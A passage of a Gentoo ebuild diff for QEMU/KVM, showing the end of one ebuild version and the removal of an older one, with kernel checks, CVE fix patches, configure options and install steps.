usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-CVE-2015-3456.patch #549404
epatch "${FILESDIR}"/${P}-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${P}-CVE-2015-5158.patch #555680
epatch "${FILESDIR}"/${P}-CVE-2015-3214.patch #556052
epatch "${FILESDIR}"/${P}-CVE-2015-5154-1.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-2.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-3.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5165-1.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-2.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-3.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-4.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-5.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-6.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-7.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5166.patch #556304
epatch "${FILESDIR}"/${P}-virtio-serial.patch #557206
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}


@ -1,602 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.3.0-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${PN}-2.3.0-virtio-serial.patch #557206
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
